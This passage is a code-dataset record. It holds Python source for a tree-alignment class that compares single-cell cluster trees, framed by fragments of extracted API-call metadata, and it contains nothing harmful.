(['(-6)', '(6.5)', '(1)'], {}), '(-6, 6.5, 1)\n', (1929, 1941), False, 'import numpy\n'), ((5474, 5516), 'branca.colormap.linear.viridis.scale', 'branca.colormap.linear.viridis.scale', (['(0)', '(4)'], {}), '(0, 4)\n', (5510, 5516), False, 'import branca\n'), ((1704, 1723), 'numpy.array', 'numpy.array', (['(X, Y)'], {}), '((X, Y))\n', (1715, 1723), False, 'import numpy\n'), ((2092, 2134), 'numpy.linspace', 'numpy.linspace', (['lim[0]', 'lim[1]', 'quiver_res'], {}), '(lim[0], lim[1], quiver_res)\n', (2106, 2134), False, 'import numpy\n'), ((2135, 2177), 'numpy.linspace', 'numpy.linspace', (['lim[2]', 'lim[3]', 'quiver_res'], {}), '(lim[2], lim[3], quiver_res)\n', (2149, 2177), False, 'import numpy\n'), ((3074, 3135), 'scipy.interpolate.griddata', 'griddata', (['XY[~bad, :]', 'u[~bad]', '(Xreg, Yreg)'], {'method': '"""linear"""'}), "(XY[~bad, :], u[~bad], (Xreg, Yreg), method='linear')\n", (3082, 3135), False, 'from scipy.interpolate import griddata, RegularGridInterpolator\n'), ((3140, 3201), 'scipy.interpolate.griddata', 'griddata', (['XY[~bad, :]', 'v[~bad]', '(Xreg, Yreg)'], {'method': '"""linear"""'}), "(XY[~bad, :], v[~bad], (Xreg, Yreg), method='linear')\n", (3148, 3201), False, 'from scipy.interpolate import griddata, RegularGridInterpolator\n'), ((3206, 3267), 'scipy.interpolate.griddata', 'griddata', (['XY[~bad, :]', 'e[~bad]', '(Xreg, Yreg)'], {'method': '"""linear"""'}), "(XY[~bad, :], e[~bad], (Xreg, Yreg), method='linear')\n", (3214, 3267), False, 'from scipy.interpolate import griddata, RegularGridInterpolator\n'), ((3272, 3333), 'scipy.interpolate.griddata', 'griddata', (['XY[~bad, :]', 'd[~bad]', '(Xreg, Yreg)'], {'method': '"""linear"""'}), "(XY[~bad, :], d[~bad], (Xreg, Yreg), method='linear')\n", (3280, 3333), False, 'from scipy.interpolate import griddata, RegularGridInterpolator\n'), ((3341, 3369), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(30, 18)'}), '(figsize=(30, 18))\n', (3351, 3369), True, 'import matplotlib.pyplot as plt\n'), ((3719, 3753), 'mplleaflet.fig_to_geojson', 'mplleaflet.fig_to_geojson', ([], {'fig': 'fig'}), '(fig=fig)\n', (3744, 3753), False, 'import mplleaflet\n'), ((3854, 3899), 'folium.FeatureGroup', 'folium.FeatureGroup', ([], {'name': 'name', 'show': 'is_first'}), '(name=name, show=is_first)\n', (3873, 3899), False, 'import folium\n'), ((3978, 4032), 'scipy.interpolate.RegularGridInterpolator', 'RegularGridInterpolator', (['[Yreg[:, 0], Xreg[0, :]]', 'mag'], {}), '([Yreg[:, 0], Xreg[0, :]], mag)\n', (4001, 4032), False, 'from scipy.interpolate import griddata, RegularGridInterpolator\n'), ((3435, 3462), 'numpy.sqrt', 'numpy.sqrt', (['(U ** 2 + V ** 2)'], {}), '(U ** 2 + V ** 2)\n', (3445, 3462), False, 'import numpy\n'), ((3469, 3483), 'numpy.isnan', 'numpy.isnan', (['U'], {}), '(U)\n', (3480, 3483), False, 'import numpy\n'), ((3493, 3507), 'numpy.isnan', 'numpy.isnan', (['V'], {}), '(V)\n', (3504, 3507), False, 'import numpy\n'), ((3519, 3535), 'numpy.isnan', 'numpy.isnan', (['mag'], {}), '(mag)\n', (3530, 3535), False, 'import numpy\n'), ((5203, 5398), 'folium.TileLayer', 'folium.TileLayer', ([], {'tiles': '"""https://server.arcgisonline.com/ArcGIS/rest/services/World_Imagery/MapServer/tile/{z}/{y}/{x}"""', 'attr': '"""Esri"""', 'name': '"""Esri Satellite"""', 'overlay': '(False)', 'control': '(False)'}), "(tiles=\n 'https://server.arcgisonline.com/ArcGIS/rest/services/World_Imagery/MapServer/tile/{z}/{y}/{x}'\n , attr='Esri', name='Esri Satellite', overlay=False, control=False)\n", (5219, 5398), False, 'import folium\n'), ((5551, 5578), 'numpy.arange', 'numpy.arange', (['(0)', '(4.01)', '(0.01)'], {}), '(0, 4.01, 0.01)\n', (5563, 5578), False, 'import numpy\n'), ((5640, 5676), 'folium.LayerControl', 'folium.LayerControl', ([], {'collapsed': '(False)'}), '(collapsed=False)\n', (5659, 5676), False, 'import folium\n'), ((1960, 1979), 'datetime.timedelta', 'timedelta', ([], {'hours': 'dt'}), '(hours=dt)\n', (1969, 1979), False, 'from datetime import timedelta\n'), ((3681, 3695), 'matplotlib.cm.viridis', 'cm.viridis', (['(64)'], {}), '(64)\n', (3691, 3695), False, 'from matplotlib import cm\n'), ((4295, 4305), 'matplotlib.path.Path', 'Path', (['vert'], {}), '(vert)\n', (4299, 4305), False, 'from matplotlib.path import Path\n'), ((4667, 4725), 'folium.features.DivIcon', 'folium.features.DivIcon', ([], {'html': 'div', 'icon_anchor': 'icon_anchor'}), '(html=div, icon_anchor=icon_anchor)\n', (4690, 4725), False, 'import folium\n'), ((4854, 4890), 'folium.Marker', 'folium.Marker', (['[lat, lon]'], {'icon': 'icon'}), '([lat, lon], icon=icon)\n', (4867, 4890), False, 'import folium\n'), ((4941, 4967), 'folium.Popup', 'folium.Popup', (["('%.1f' % Spd)"], {}), "('%.1f' % Spd)\n", (4953, 4967), False, 'import folium\n')] |
import itertools
from collections import deque
import networkx as nx
import numpy as np
import pandas as pd
import scanpy as sc
from .._util import CapitalData
class Tree_Alignment:
def __init__(self):
self.__successors1 = None
self.__postorder1 = None
self.__tree1 = None
self.__successors2 = None
self.__postorder2 = None
self.__tree2 = None
self.__forestdistance = None
self.__traceforest = None
self.__treedistance = None
self.__tracetree = None
self.__alignmentcost = None
def tree_alignment(
self,
adata1,
adata2,
cost=1.0,
N_1=2000,
N_2=2000
):
COST = cost
gene_list = self.sort_data(
adata1, adata2, N_1, N_2)
adata1.uns["capital"]["intersection_genes"] = np.array(
gene_list, dtype=object)
adata2.uns["capital"]["intersection_genes"] = np.array(
gene_list, dtype=object)
self._dp(adata1, adata2, gene_list, COST)
alignedtree = self._traceback()
path_cluster_list = []
source_node = list(nx.topological_sort(alignedtree))[0]
for node in list(alignedtree.nodes):
if alignedtree.out_degree(node) == 0:
cluster_list = nx.shortest_path(
alignedtree, source=source_node, target=node)
route1 = [i[0] for i in cluster_list]
route2 = [i[1] for i in cluster_list]
path_cluster_list.append([route1, route2])
alignmentdict = {"alignment{:03d}".format(i):
{"data1": clusters[0],
"data2": clusters[1]}
for i, clusters in enumerate(path_cluster_list)}
aligned_data = CapitalData(
adata1.copy(),
adata2.copy(),
alignedtree,
np.array([self.__alignmentcost], dtype=int),
np.array(gene_list, dtype=object),
alignmentdict,
)
return aligned_data
def _set_initial_condition(
self,
data1,
data2,
cost=1.0
):
self.__successors1 = data1.uns["capital"]["tree"]["successors"]
self.__postorder1 = data1.uns["capital"]["tree"]["postorder"]
self.__tree1 = nx.convert_matrix.from_pandas_adjacency(
data1.uns["capital"]["tree"]["tree"], create_using=nx.DiGraph)
self.__successors2 = data2.uns["capital"]["tree"]["successors"]
self.__postorder2 = data2.uns["capital"]["tree"]["postorder"]
self.__tree2 = nx.convert_matrix.from_pandas_adjacency(
data2.uns["capital"]["tree"]["tree"],create_using=nx.DiGraph)
# get combination of children
# D(F1[i],F2[j]) is stored in forestdistance.loc[i,j]
# D(F1[i1,i2],F2[j]) is stored in forestdistance.loc["(i1,i2)",j]
# D({T1[i]},F2[j]) is stored in forestdistance.loc["(i,)", j]
forest1_combinations = []
for child in self.__successors1.values():
if child.size == 1:
children = list(itertools.combinations(child, 1))
forest1_combinations.extend(children)
elif child.size >= 1:
for k in range(1, child.size):
children = list(itertools.combinations(child, k))
forest1_combinations.extend(children)
forest2_combinations = []
for child in self.__successors2.values():
if child.size == 1:
children = list(itertools.combinations(child, 1))
forest2_combinations.extend(children)
elif child.size >= 1:
for k in range(1, child.size):
children = list(itertools.combinations(child, k))
forest2_combinations.extend(children)
forest1 = [i for i in list(self.__tree1.nodes)] + \
forest1_combinations + ["#"]
forest2 = [j for j in list(self.__tree2.nodes)] + \
forest2_combinations + ["#"]
forest1 = list(map(str, forest1))
forest2 = list(map(str, forest2))
forest = pd.DataFrame(index=forest1, columns=forest2)
forest.loc["#", "#"] = 0
tree = pd.DataFrame(
index=list(map(str, list(self.__tree1))) + ["#"],
columns=list(map(str, list(self.__tree2))) + ["#"])
tree.loc["#", "#"] = 0
self.__forestdistance = forest
self.__traceforest = pd.DataFrame(index=forest1, columns=forest2)
self.__treedistance = tree
self.__tracetree = pd.DataFrame(
index=list(map(str, list(self.__tree1))) + ["#"],
columns=list(map(str, list(self.__tree2))) + ["#"])
COST = cost
for i in self.__postorder1:
size, successors = self._get_successors(self.__successors1, i)
if size == 1:
# D(F1[i],θ) = Σ D(T1[ik],θ)
self._setF(i, "#", self._getT(successors[0], "#"))
self._setT(i, "#", self._getF(i, "#") + COST)
else:
# D(F1[i],θ) = Σ D(T1[ik],θ)
tmp = 0
for ichild in successors:
tmp += self._getT(ichild, "#")
self._setF(i, "#", tmp)
# D({T1[ip],...,T1[iq]},θ) = D(T1[ip],θ) + ... + D(T1[iq],θ)
for k in range(1, size):
children = list(itertools.combinations(successors, k))
for ichild in children:
tmp = 0
for k in ichild:
tmp += self._getT(k, "#")
self._setF(ichild, "#", tmp)
self._setT(i, "#", self._getF(i, "#") + COST)
for j in self.__postorder2:
size, successors = self._get_successors(self.__successors2, j)
if size == 1:
self._setF("#", j, self._getT("#", successors[0]))
self._setT("#", j, self._getF("#", j) + COST)
else:
tmp = 0
for jchild in successors:
tmp += self._getT("#", jchild)
self._setF("#", j, tmp)
for k in range(1, size):
children = list(itertools.combinations(successors, k))
for jchild in children:
tmp = 0
for k in jchild:
tmp += self._getT("#", k)
self._setF("#", jchild, tmp)
self._setT("#", j, self._getF("#", j) + COST)
@property
def forestdistance(self):
return self.__forestdistance
@property
def traceforest(self):
return self.__traceforest
@property
def tracetree(self):
return self.__tracetree
@property
def treedistance(self):
return self.__treedistance
def sort_data(
self,
adata1,
adata2,
N_1=None,
N_2=None
):
if N_1 is not None:
adata1 = adata1.raw.to_adata()
sc.pp.highly_variable_genes(adata1, n_top_genes=N_1)
adata1 = adata1[:, adata1.var['highly_variable']]
elif N_1 is None:
pass
if N_2 is not None:
adata2 = adata2.raw.to_adata()
sc.pp.highly_variable_genes(adata2, n_top_genes=N_2)
adata2 = adata2[:, adata2.var['highly_variable']]
elif N_2 is None:
pass
s1 = set(adata1.var.index)
s2 = set(adata2.var.index)
intersection_list = list(s1.intersection(s2))
if len(intersection_list) < 2:
raise ValueError("highly variable genes of intersection of data1 and data2 are not enough "\
"to calculate the cost of a tree alignment. \n"\
"Specify num_genes1 and num_genes2 carefully.")
print("{} genes are used to calculate cost of tree alignment.\n".format(
len(intersection_list)))
return intersection_list
# cluster_centroid: pd.DataFrame
# index is cluster name, columns is gene name, X is gene expression level
def _calculate_cluster_centroid_for_genes(
self,
adata,
gene_list,
):
groupby = adata.uns["capital"]["tree"]["annotation"]
filtered_data = adata.raw.to_adata()[:, gene_list]
cluster_centroid_data = np.empty((0, filtered_data.n_vars))
clustername = filtered_data.obs[groupby].unique().tolist()
for i in clustername:
a_cluster_data = filtered_data[filtered_data.obs[groupby] == "{}".format(
i)].to_df()
a_cluster_median = a_cluster_data.median(axis=0).values
cluster_centroid_data = np.vstack(
(cluster_centroid_data, a_cluster_median)
)
cluster_centroid = pd.DataFrame(
cluster_centroid_data,
index=clustername,
columns=filtered_data.var_names
)
return cluster_centroid
# return length of i's children and tuple of children
def _get_successors(self, successors, i):
size = successors[i].size
successor = tuple([str(k) for k in successors[i]])
if len(successor) == 0:
successor = ("#")
return size, successor
def _setF(self, i, j, distance):
if isinstance(i, tuple):
if len(i) == 0:
i = "#"
i = str(i)
if isinstance(j, tuple):
if len(j) == 0:
j = "#"
j = str(j)
if i not in self.__forestdistance.index:
print("Error: {} does not exist in forestdistance index.".format(i))
if j not in self.__forestdistance.columns:
print("Error: {} does not exist in forestdistance columns.".format(j))
self.__forestdistance.loc[i, j] = distance
def _settraceF(self, i, j, trace):
if isinstance(i, tuple):
if len(i) == 0:
i = "#"
i = str(i)
if isinstance(j, tuple):
if len(j) == 0:
j = "#"
j = str(j)
if i not in self.__traceforest.index:
print("Error: {} does not exist in traceforest index.".format(i))
if j not in self.__traceforest.columns:
print("Error: {} does not exist in traceforest columns.".format(j))
self.__traceforest.loc[i, j] = trace
def _settraceT(self, i, j, trace):
if isinstance(i, tuple):
if len(i) == 0:
i = "#"
i = str(i)
if isinstance(j, tuple):
if len(j) == 0:
j = "#"
j = str(j)
if i not in self.__tracetree.index:
print("Error: {} does not exist in tracetree index.".format(i))
if j not in self.__tracetree.columns:
print("Error: {} does not exist in tracetree columns.".format(j))
self.__tracetree.loc[i, j] = trace
def _setT(self, i, j, distance):
if isinstance(i, tuple):
if len(i) == 0:
i = "#"
i = str(i)
if isinstance(j, tuple):
if len(j) == 0:
j = "#"
j = str(j)
if i not in self.__treedistance.index:
print("Error: {} does not exist in treedistance index.".format(i))
if j not in self.__treedistance.columns:
print("Error: {} does not exist in treedistance columns.".format(j))
self.__treedistance.loc[i, j] = distance
def _getF(self, i, j, parent1="Nan", parent2="Nan"):
if isinstance(i, tuple):
if len(i) == 0:
i = "#"
i = str(i)
if isinstance(j, tuple):
if len(j) == 0:
j = "#"
j = str(j)
if i not in self.__forestdistance.index:
i = str(parent1)
if j not in self.__forestdistance.columns:
j = str(parent2)
F = self.__forestdistance.loc[i, j]
return F
def _getT(self, i, j):
i = str(i)
j = str(j)
if i not in self.__treedistance.index:
print("Error: TreeDistance index called does not exist.")
if j not in self.__treedistance.columns:
print("Error: TreeDistance columns called does not exist.")
T = self.__treedistance.loc[i, j]
return T
def _cal1(self, A, B):
if not isinstance(A, tuple):
_, A = self._get_successors(self.__successors1, A)
if not isinstance(B, tuple):
_, B = self._get_successors(self.__successors2, B)
mintemp = 1000
trace = "Nan"
temp = 0
for k in A:
for l in B:
Asub = tuple([i for i in A if i != k])
Bsub = tuple([j for j in B if j != l])
temp = self._getF(Asub, Bsub) + self._getT(k, l)
if mintemp > temp:
mintemp = temp
if Bsub == ():
Bsub = "#"
if l == ():
l = "#"
if Asub == ():
Asub = "#"
if k == ():
k = "#"
trace = [1, [Asub, Bsub], [k, l]]
return mintemp, trace
def _cal2(self, A, B, cost):
COST = cost
parentA = "Nan"
parentB = "Nan"
if not isinstance(A, tuple):
parentA = A
_, A = self._get_successors(self.__successors1, A)
if not isinstance(B, tuple):
parentB = B
_, B = self._get_successors(self.__successors2, B)
Bprime = [()]
for m in range(1, len(B)+1):
for Bp in list(itertools.combinations(B, m)):
Bprime.extend([Bp])
mintemp = 1000
trace = "Nan"
temp = 0
for k in A:
for Bp in Bprime:
Asub = tuple([i for i in A if i != k])
Bsub = tuple([j for j in B if not j in Bp])
if k == "#":
temp = self._getF(Asub, Bsub, parent2=parentB) + \
self._getF("#", Bp, parent2=parentB)
else:
temp = self._getF(Asub, Bsub, parent2=parentB) + \
self._getF(k, Bp, parent2=parentB) + COST
if mintemp > temp:
mintemp = temp
if Bsub == ():
Bsub = "#"
if Bp == ():
Bp = "#"
if Asub == ():
Asub = "#"
if k == ():
k = "#"
if not "{}".format(Bsub) in self.__forestdistance.columns:
Bsub = parentB
if not "{}".format(Bp) in self.__forestdistance.columns:
Bp = parentB
trace = [2, [[Asub, Bsub], [k, Bp]], (k, "#")]
return mintemp, trace
# min D(A-Aprime,B-{T2[jq]}) + D(Aprime,F2[jq]) + cost
def _cal3(self, A, B, cost):
COST = cost
parentA = "Nan"
parentB = "Nan"
if not isinstance(A, tuple):
parentA = A
_, A = self._get_successors(self.__successors1, A)
if not isinstance(B, tuple):
parentB = B
_, B = self._get_successors(self.__successors2, B)
Aprime = [()]
for m in range(1, len(A)+1):
for Ap in list(itertools.combinations(A, m)):
Aprime.extend([Ap])
mintemp = 1000
trace = "Nan"
temp = 0
for l in B:
for Ap in Aprime:
Asub = tuple([i for i in A if i not in Ap])
Bsub = tuple([j for j in B if j != l])
temp = self._getF(Asub, Bsub, parent1=parentA) + \
self._getF(Ap, l, parent1=parentA) + COST
if mintemp > temp:
mintemp = temp
if Bsub == ():
Bsub = "#"
if l == ():
l = "#"
if Asub == ():
Asub = "#"
if Ap == ():
Ap = "#"
if not "{}".format(Asub) in self.__forestdistance.index:
Asub = parentA
if not "{}".format(Ap) in self.__forestdistance.index:
Ap = parentA
trace = [3, [[Asub, Bsub], [Ap, l]], ("#", l)]
return mintemp, trace
# trace is a list that has 3 pairs like [a,(b),(c)]
# a is a record that show which calculation was done
# (b) is a pair or 2 pairs that goes to the search in traceforest for the next traceback
# (c) is a pair that goes to stack or foreststack
def _calculateForest(
self,
A,
B,
cost
):
COST = cost
min1, trace1 = self._cal1(A, B)
min2, trace2 = self._cal2(A, B, COST)
min3, trace3 = self._cal3(A, B, COST)
forestdistance = np.array([min1, min2, min3], dtype=object).min()
trace = [trace1, trace2, trace3][np.array([min1, min2, min3], dtype=object).argmin()]
return forestdistance, trace
# trace is a list that has 3 pairs like [(a),(b),(c)]
# (a) is a record that show which calculation was done
# (b) is a pair of the match result for D(T[i],T[j])
# (c) is a pair that goes to the stack
def _calculateTreedistance(
self,
i,
j,
mincost
):
MINCOST = mincost
_, successor1 = self._get_successors(self.__successors1, i)
_, successor2 = self._get_successors(self.__successors2, j)
distancelist = []
for l in successor2:
distancelist.append(
[self._getT("#", j) + self._getT(i, l) - self._getT("#", l), [0, ("#", j), (i, l)]])
for k in successor1:
distancelist.append(
[self._getT(i, "#") + self._getT(k, j) - self._getT(k, "#"), [0, (i, "#"), (k, j)]])
distancelist.append([self._getF(i, j) + MINCOST, [1, (i, j), (i, j)]])
array = np.array(distancelist, dtype=object)
treedistance = array[:, 0].min()
trace = array[array[:, 0].argmin(), 1]
return treedistance, trace
def _dp(
self,
adata1,
adata2,
gene_list,
cost
):
# np.warning cause warning below
# VisibleDeprecationWarning: Creating an ndarray from ragged nested sequences is deprecated.
# If you meant to do this, you must specify 'dtype=object' when creating the ndarray.
# however it causes inside pandas and to recover this wanrnig, we need to rewrite all the code above
# and it still get the result we need. we will get this right soon.
np.warnings.filterwarnings(
'ignore', category=np.VisibleDeprecationWarning)
COST = cost
self._set_initial_condition(adata1, adata2, cost=COST)
cluster_centroid1 = self._calculate_cluster_centroid_for_genes(
adata1, gene_list)
cluster_centroid2 = self._calculate_cluster_centroid_for_genes(
adata2, gene_list)
for i in self.__postorder1:
for j in self.__postorder2:
df = pd.DataFrame(
{"A": cluster_centroid1.loc[i], "B": cluster_centroid2.loc[j]})
mincost = 1 - df.corr(method="spearman").iloc[0, 1]
size1, successor1 = self._get_successors(self.__successors1, i)
size2, successor2 = self._get_successors(self.__successors2, j)
Alist = []
if size1 == 0:
pass
elif size1 == 1:
Alist.extend([(successor1)])
else:
for m in range(1, len(successor1)):
for l in list(itertools.combinations(successor1, m)):
Alist.extend([l])
Alist.extend([i])
if size2 == 0:
pass
elif size2 == 1:
for A in Alist:
fdistance, ftrace = self._calculateForest(
A, (successor2), COST)
self._setF(A, (successor2), fdistance)
self._settraceF(A, (successor2), ftrace)
else:
for m in range(1, len(successor2)):
for B in list(itertools.combinations(successor2, m)):
for A in Alist:
fdistance, ftrace = self._calculateForest(
A, B, COST)
self._setF(A, B, fdistance)
self._settraceF(A, B, ftrace)
for A in Alist:
fdistance, ftrace = self._calculateForest(A, j, COST)
self._setF(A, j, fdistance)
self._settraceF(A, j, ftrace)
tdistance, ttrace = self._calculateTreedistance(i, j, mincost)
self._setT(i, j, tdistance)
self._settraceT(i, j, ttrace)
def _traceback(self):
G = nx.DiGraph()
G.add_node("tempnode")
parent = "tempnode"
stack = deque()
stack.append(
(self.__postorder1[-1], self.__postorder2[-1], parent))
while len(stack) != 0:
i, j, parent = stack.pop()
if i == "#" and j == "#":
continue
elif i == "#":
if j != "#":
H = nx.dfs_tree(self.__tree2, j)
G = nx.compose(G, H)
G.add_edge(parent, j)
G = nx.relabel_nodes(
G, dict(zip(list(H.nodes), [("#", k) for k in H.nodes])))
continue
elif j == "#":
if i != "#":
H = nx.dfs_tree(self.__tree1, i)
G = nx.compose(G, H)
G.add_edge(parent, i)
G = nx.relabel_nodes(
G, dict(zip(list(H.nodes), [(k, "#") for k in H.nodes])))
continue
elif i != "#" and j != "#":
tree_result = self.__tracetree.loc[i, j]
forest_result = self.__traceforest.loc[i, j]
if tree_result[0] == 0:
if tree_result[1][0] == "#" and tree_result[1][1] != "#":
H = nx.dfs_tree(self.__tree2,
source=tree_result[1][1])
Hprime = nx.dfs_tree(
self.__tree2, source=tree_result[2][1])
H.remove_nodes_from(list(Hprime.nodes))
G = nx.compose(G, H)
G.add_edge(parent, tree_result[1][1])
G = nx.relabel_nodes(
G, dict(zip(list(H.nodes), [("#", k) for k in H.nodes])))
elif tree_result[1][0] != "#" and tree_result[1][1] == "#":
H = nx.dfs_tree(self.__tree1,
source=tree_result[1][0])
Hprime = nx.dfs_tree(
self.__tree1, source=tree_result[2][0])
H.remove_nodes_from(list(Hprime.nodes))
G = nx.compose(G, H)
G.add_edge(parent, tree_result[1][0])
G = nx.relabel_nodes(
G, dict(zip(list(H.nodes), [(k, "#") for k in H.nodes])))
stack.append(
[tree_result[2][0], tree_result[2][1], tree_result[1]])
elif tree_result[0] == 1:
G.add_node(tree_result[1])
G.add_edge(parent, tree_result[1])
foreststack = deque()
foreststack.append([i, j, (i, j)])
while len(foreststack) != 0:
i_f, j_f, p_f = foreststack.pop()
if i_f == "#" and j_f == "#":
continue
elif i_f == "#":
if j_f != "#":
for j_tmp in j_f:
H = nx.dfs_tree(
self.__tree2, source=j_tmp)
G = nx.compose(G, H)
G.add_edge(p_f, j_tmp)
G = nx.relabel_nodes(
G, dict(zip(list(H.nodes), [("#", k) for k in H.nodes])))
elif j_f == "#":
if i_f != "#":
for i_tmp in i_f:
H = nx.dfs_tree(
self.__tree1, source=i_tmp)
G = nx.compose(G, H)
G.add_edge(p_f, i_tmp)
G = nx.relabel_nodes(
G, dict(zip(list(H.nodes), [(k, "#") for k in H.nodes])))
elif i_f != "#" and j_f != "#":
i_f = "{}".format(i_f)
j_f = "{}".format(j_f)
forest_result = self.__traceforest.loc[i_f, j_f]
if forest_result[0] == 1:
stack.append(
[forest_result[2][0], forest_result[2][1], p_f])
foreststack.append(
[forest_result[1][0], forest_result[1][1], p_f])
elif forest_result[0] == 2:
foreststack.append(
[forest_result[1][0][0], forest_result[1][0][1], p_f])
if forest_result[1][1][1] != "#":
G.add_node(forest_result[2])
G.add_edge(p_f, forest_result[2])
foreststack.append(
[forest_result[1][1][0], forest_result[1][1][1], forest_result[2]])
elif forest_result[1][1][1] == "#":
H = nx.dfs_tree(
self.__tree1, forest_result[1][1][0])
G = nx.compose(G, H)
G.add_edge(p_f, forest_result[1][1][0])
G = nx.relabel_nodes(
G, dict(zip(list(H.nodes), [(k, "#") for k in H.nodes])))
elif forest_result[0] == 3:
foreststack.append(
[forest_result[1][0][0], forest_result[1][0][1], p_f])
if forest_result[1][1][0] != "#":
G.add_node(forest_result[2])
G.add_edge(p_f, forest_result[2])
foreststack.append(
[forest_result[1][1][0], forest_result[1][1][1], forest_result[2]])
elif forest_result[1][1][0] == "#":
H = nx.dfs_tree(
self.__tree2, forest_result[1][1][1])
G = nx.compose(G, H)
G.add_edge(p_f, forest_result[1][1][1])
G = nx.relabel_nodes(
G, dict(zip(list(H.nodes), [("#", k) for k in H.nodes])))
G.remove_node("tempnode")
alignmentcost = self.__treedistance.loc[self.__postorder1[-1],
self.__postorder2[-1]]
self.__alignmentcost = alignmentcost/len(G)
return G
| [
"pandas.DataFrame",
"scanpy.pp.highly_variable_genes",
"numpy.empty",
"networkx.dfs_tree",
"networkx.topological_sort",
"networkx.shortest_path",
"itertools.combinations",
"numpy.vstack",
"numpy.array",
"networkx.compose",
"networkx.convert_matrix.from_pandas_adjacency",
"networkx.DiGraph",
... | [((854, 887), 'numpy.array', 'np.array', (['gene_list'], {'dtype': 'object'}), '(gene_list, dtype=object)\n', (862, 887), True, 'import numpy as np\n'), ((955, 988), 'numpy.array', 'np.array', (['gene_list'], {'dtype': 'object'}), '(gene_list, dtype=object)\n', (963, 988), True, 'import numpy as np\n'), ((2352, 2459), 'networkx.convert_matrix.from_pandas_adjacency', 'nx.convert_matrix.from_pandas_adjacency', (["data1.uns['capital']['tree']['tree']"], {'create_using': 'nx.DiGraph'}), "(data1.uns['capital']['tree']['tree'\n ], create_using=nx.DiGraph)\n", (2391, 2459), True, 'import networkx as nx\n'), ((2633, 2740), 'networkx.convert_matrix.from_pandas_adjacency', 'nx.convert_matrix.from_pandas_adjacency', (["data2.uns['capital']['tree']['tree']"], {'create_using': 'nx.DiGraph'}), "(data2.uns['capital']['tree']['tree'\n ], create_using=nx.DiGraph)\n", (2672, 2740), True, 'import networkx as nx\n'), ((4188, 4232), 'pandas.DataFrame', 'pd.DataFrame', ([], {'index': 'forest1', 'columns': 'forest2'}), '(index=forest1, columns=forest2)\n', (4200, 4232), True, 'import pandas as pd\n'), ((4522, 4566), 'pandas.DataFrame', 'pd.DataFrame', ([], {'index': 'forest1', 'columns': 'forest2'}), '(index=forest1, columns=forest2)\n', (4534, 4566), True, 'import pandas as pd\n'), ((8502, 8537), 'numpy.empty', 'np.empty', (['(0, filtered_data.n_vars)'], {}), '((0, filtered_data.n_vars))\n', (8510, 8537), True, 'import numpy as np\n'), ((8964, 9056), 'pandas.DataFrame', 'pd.DataFrame', (['cluster_centroid_data'], {'index': 'clustername', 'columns': 'filtered_data.var_names'}), '(cluster_centroid_data, index=clustername, columns=\n filtered_data.var_names)\n', (8976, 9056), True, 'import pandas as pd\n'), ((18381, 18417), 'numpy.array', 'np.array', (['distancelist'], {'dtype': 'object'}), '(distancelist, dtype=object)\n', (18389, 18417), True, 'import numpy as np\n'), ((19071, 19146), 'numpy.warnings.filterwarnings', 'np.warnings.filterwarnings', (['"""ignore"""'], {'category': 'np.VisibleDeprecationWarning'}), "('ignore', category=np.VisibleDeprecationWarning)\n", (19097, 19146), True, 'import numpy as np\n'), ((21509, 21521), 'networkx.DiGraph', 'nx.DiGraph', ([], {}), '()\n', (21519, 21521), True, 'import networkx as nx\n'), ((21597, 21604), 'collections.deque', 'deque', ([], {}), '()\n', (21602, 21604), False, 'from collections import deque\n'), ((1927, 1970), 'numpy.array', 'np.array', (['[self.__alignmentcost]'], {'dtype': 'int'}), '([self.__alignmentcost], dtype=int)\n', (1935, 1970), True, 'import numpy as np\n'), ((1984, 2017), 'numpy.array', 'np.array', (['gene_list'], {'dtype': 'object'}), '(gene_list, dtype=object)\n', (1992, 2017), True, 'import numpy as np\n'), ((7148, 7200), 'scanpy.pp.highly_variable_genes', 'sc.pp.highly_variable_genes', (['adata1'], {'n_top_genes': 'N_1'}), '(adata1, n_top_genes=N_1)\n', (7175, 7200), True, 'import scanpy as sc\n'), ((7390, 7442), 'scanpy.pp.highly_variable_genes', 'sc.pp.highly_variable_genes', (['adata2'], {'n_top_genes': 'N_2'}), '(adata2, n_top_genes=N_2)\n', (7417, 7442), True, 'import scanpy as sc\n'), ((8854, 8906), 'numpy.vstack', 'np.vstack', (['(cluster_centroid_data, a_cluster_median)'], {}), '((cluster_centroid_data, a_cluster_median))\n', (8863, 8906), True, 'import numpy as np\n'), ((1152, 1184), 'networkx.topological_sort', 'nx.topological_sort', (['alignedtree'], {}), '(alignedtree)\n', (1171, 1184), True, 'import networkx as nx\n'), ((1315, 1377), 'networkx.shortest_path', 'nx.shortest_path', (['alignedtree'], {'source': 'source_node', 'target': 'node'}), '(alignedtree, source=source_node, target=node)\n', (1331, 1377), True, 'import networkx as nx\n'), ((13877, 13905), 'itertools.combinations', 'itertools.combinations', (['B', 'm'], {}), '(B, m)\n', (13899, 13905), False, 'import itertools\n'), ((15663, 15691), 'itertools.combinations', 'itertools.combinations', (['A', 'm'], {}), '(A, m)\n', (15685, 15691), False, 'import itertools\n'), ((17279, 17321), 'numpy.array', 'np.array', (['[min1, min2, min3]'], {'dtype': 'object'}), '([min1, min2, min3], dtype=object)\n', (17287, 17321), True, 'import numpy as np\n'), ((19549, 19625), 'pandas.DataFrame', 'pd.DataFrame', (["{'A': cluster_centroid1.loc[i], 'B': cluster_centroid2.loc[j]}"], {}), "({'A': cluster_centroid1.loc[i], 'B': cluster_centroid2.loc[j]})\n", (19561, 19625), True, 'import pandas as pd\n'), ((3141, 3173), 'itertools.combinations', 'itertools.combinations', (['child', '(1)'], {}), '(child, 1)\n', (3163, 3173), False, 'import itertools\n'), ((3587, 3619), 'itertools.combinations', 'itertools.combinations', (['child', '(1)'], {}), '(child, 1)\n', (3609, 3619), False, 'import itertools\n'), ((17369, 17411), 'numpy.array', 'np.array', (['[min1, min2, min3]'], {'dtype': 'object'}), '([min1, min2, min3], dtype=object)\n', (17377, 17411), True, 'import numpy as np\n'), ((5477, 5514), 'itertools.combinations', 'itertools.combinations', (['successors', 'k'], {}), '(successors, k)\n', (5499, 5514), False, 'import itertools\n'), ((6323, 6360), 'itertools.combinations', 'itertools.combinations', (['successors', 'k'], {}), '(successors, k)\n', (6345, 6360), False, 'import itertools\n'), ((21911, 21939), 'networkx.dfs_tree', 'nx.dfs_tree', (['self.__tree2', 'j'], {}), '(self.__tree2, j)\n', (21922, 21939), True, 'import networkx as nx\n'), ((21964, 21980), 'networkx.compose', 'nx.compose', (['G', 'H'], {}), '(G, H)\n', (21974, 21980), True, 'import networkx as nx\n'), ((3346, 3378), 'itertools.combinations', 'itertools.combinations', (['child', 'k'], {}), '(child, k)\n', (3368, 3378), False, 'import itertools\n'), ((3792, 3824), 